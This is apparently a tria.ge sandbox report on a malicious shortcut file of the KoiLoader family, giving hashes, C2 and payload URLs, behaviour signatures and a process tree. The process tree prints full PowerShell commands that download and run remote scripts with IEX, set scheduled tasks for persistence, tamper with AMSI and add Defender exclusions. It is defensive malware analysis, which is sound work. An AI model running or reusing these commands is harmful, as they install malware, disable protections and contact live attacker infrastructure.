Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/12/2024, 11:14
Static task
static1
Behavioral task
behavioral1
Sample
22_11_2024_stmnt.lnk
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
22_11_2024_stmnt.lnk
Resource
win10v2004-20241007-en
General
-
Target
22_11_2024_stmnt.lnk
-
Size
3KB
-
MD5
a8adbb0f006cbb7a70d7c2dcb0e2cff6
-
SHA1
38f9fbf5a68943dc8f265191bb302722afed95d7
-
SHA256
d480330c8ee5ab7fb143c23321531474b736e7cca9abe933da41b2fe2472863c
-
SHA512
97686340a9b30c0516f8f7ac76a19a6547a6e407588dca5ac042ac767af0c57560059457e8042ccb2d3a031637d5ebd2d299e14446c6e0768c5cae75c1ae45fb
Malware Config
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
koiloader
http://195.123.217.43/oversate.php
-
payload_url
https://www.italialife24.it/wp-content/uploads/2021/05
Signatures
-
Koiloader family
-
Detects KoiLoader payload 2 IoCs
resource yara_rule behavioral2/memory/32-56-0x00000000078C0000-0x00000000078CD000-memory.dmp family_koi_loader behavioral2/memory/3352-134-0x0000000007AD0000-0x0000000007ADD000-memory.dmp family_koi_loader -
Blocklisted process makes network request 9 IoCs
flow pid Process 9 2260 powershell.exe 39 2732 powershell.exe 40 32 powershell.exe 44 32 powershell.exe 46 4208 powershell.exe 47 4208 powershell.exe 54 1580 powershell.exe 55 3352 powershell.exe 56 32 powershell.exe -
pid Process 32 powershell.exe 3352 powershell.exe 4972 powershell.exe 2260 powershell.exe 4208 powershell.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation wscript.EXE -
Indicator Removal: Clear Persistence 1 TTPs 2 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 2732 powershell.exe 1580 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2760 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 2260 powershell.exe 2260 powershell.exe 2732 powershell.exe 2732 powershell.exe 32 powershell.exe 32 powershell.exe 4972 powershell.exe 4972 powershell.exe 4208 powershell.exe 4208 powershell.exe 1580 powershell.exe 1580 powershell.exe 3352 powershell.exe 3352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 32 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 3352 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 3984 wrote to memory of 2260 3984 cmd.exe 84 PID 3984 wrote to memory of 2260 3984 cmd.exe 84 PID 2260 wrote to memory of 2760 2260 powershell.exe 85 PID 2260 wrote to memory of 2760 2260 powershell.exe 85 PID 1596 wrote to memory of 2732 1596 wscript.EXE 103 PID 1596 wrote to memory of 2732 1596 wscript.EXE 103 PID 2732 wrote to memory of 3480 2732 powershell.exe 106 PID 2732 wrote to memory of 3480 2732 powershell.exe 106 PID 2732 wrote to memory of 1248 2732 powershell.exe 107 PID 2732 wrote to memory of 1248 2732 powershell.exe 107 PID 1248 wrote to memory of 32 1248 wscript.exe 108 PID 1248 wrote to memory of 32 1248 wscript.exe 108 PID 1248 wrote to memory of 32 1248 wscript.exe 108 PID 2116 wrote to memory of 3492 2116 DllHost.exe 113 PID 2116 wrote to memory of 3492 2116 DllHost.exe 113 PID 2116 wrote to memory of 3492 2116 DllHost.exe 113 PID 3492 wrote to memory of 4972 3492 cmd.exe 115 PID 3492 wrote to memory of 4972 3492 cmd.exe 115 PID 3492 wrote to memory of 4972 3492 cmd.exe 115 PID 32 wrote to memory of 2668 32 powershell.exe 116 PID 32 wrote to memory of 2668 32 powershell.exe 116 PID 32 wrote to memory of 2668 32 powershell.exe 116 PID 2668 wrote to memory of 4208 2668 cmd.exe 118 PID 2668 wrote to memory of 4208 2668 cmd.exe 118 PID 2668 wrote to memory of 4208 2668 cmd.exe 118 PID 1676 wrote to memory of 1580 1676 wscript.EXE 121 PID 1676 wrote to memory of 1580 1676 wscript.EXE 121 PID 1580 wrote to memory of 3996 1580 powershell.exe 124 PID 1580 wrote to memory of 3996 1580 powershell.exe 124 PID 1580 wrote to memory of 1840 1580 powershell.exe 125 PID 1580 wrote to memory of 1840 1580 powershell.exe 125 PID 1840 wrote to memory of 3352 1840 wscript.exe 128 PID 1840 wrote to memory of 3352 1840 wscript.exe 128 PID 1840 wrote to memory of 3352 1840 wscript.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL83⤵
- Scheduled Task/Job: Scheduled Task
PID:2760
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\FOSU73NQNI1R.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\FOSU73NQNI1R.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f3⤵PID:3480
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\FOSU73NQNI1R.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z968NWNADKG'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\FOSU73NQNI1R.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\FOSU73NQNI1R.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f3⤵PID:3996
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\FOSU73NQNI1R.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zRJDVJW9C00'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r896de533-e5fb-4eb9-8f2b-d363f3584dc5r.js"1⤵PID:4608
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50ead04f3f2ad26eb1e5a983066aa689c
SHA194f6c706996d56be57d42b743932d17f78b64144
SHA25663ac3c2dba91ac27f590009a649d684d22106e524f31b6cbad3fcfb2c938bce6
SHA512776ada97e20d619e7a4e0959ad70bdcd82976bc8b1736dc10f4494dac8e9c7dccc20344648144dbe714964ff5d66612b20480b2c2b002376c4f5eeb868940ef8
-
Filesize
1KB
MD58523f9aaf8bb5fd45943b761c09ec5a0
SHA1b784a2b90666a420c71ff79b0e8db497ec13978a
SHA2568f7462e9501020ad30df32cb30b5fafe658a3af0d424649f5898493955530c73
SHA512744efddcf89e3992d9b95cb468216297c7deeaa03a1bc9728448392bb42f1529eaa80f17bd02a6f1ab992d28cf51c8efd0628757e3fcae52eebad3d90886fe54
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
612B
MD5507bdf00df0b4b3fe4de09b2b2cc973e
SHA1ab68f85ec79df95cd52452a5420f0745fa651c6a
SHA256b55a6f2c227f571daa050b41a5b92e64eff323786016206b145a123404eba371
SHA512f83f5413a3c2ac06ef82099bc2818c8f967db2159ff115fd49edf833929c536465ae3a668bcd60309beb96dc0afa8068bbf6578f9b4b06954761b652307cebd1
-
Filesize
19KB
MD5d3a691c8ff6562bcde7eff62bec48236
SHA167cfeede080a4de535bddbef80fb51f938dd8e2f
SHA256460103b1c544ad1e872b7d0d2b3f33dd3eb7a0bfda424f2608cf8f4a13971edf
SHA512049b21bc9aad7efba1328ffd0da8f63cf80624e37fae1ab0e3e55138aeef6475a525c1eef0acb7e8f8c319cf6ac8122359f40ea8e325447a02d9dfb5edb3dbfd
-
Filesize
1KB
MD5477031a32089e6d066092d640b526add
SHA15041602c7c71b4c6e40928039dcc07b6b32a67f2
SHA2560ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef
SHA51201388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e
-
Filesize
1KB
MD52b856bda56945fa7252034b16c0189f0
SHA1df2d4ff8394cc57a8c399bfb5602679bfdcde06b
SHA256ffc29461bd43b0ffffa1c06c260f5089cce205cab26a1a1032b924272b718205
SHA5128843b6d91163d345e2aded8143d941388852ed3d4aa39ced89a3cf8a50bb908681624a7008c0b82359736cc3222f7908a1c34442028491921d243c0581aeb3e9
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
304B
MD5b4a822601fe06adee1ac61e9c7a0c363
SHA12bf18102d80a860f6567f042e73912176569fdc4
SHA25696fcd5407b6d96796381d8ac8b96fc9ee84adc5123775206f6d45aa402e838b0
SHA512b7289ff574e808195d154d93d14883164c61cb87023740c008f68f1fcf7daa3eb49048b9c0fcea0d16d46e4f7d22f069f37409089403a5ae0eb01f9baccdd813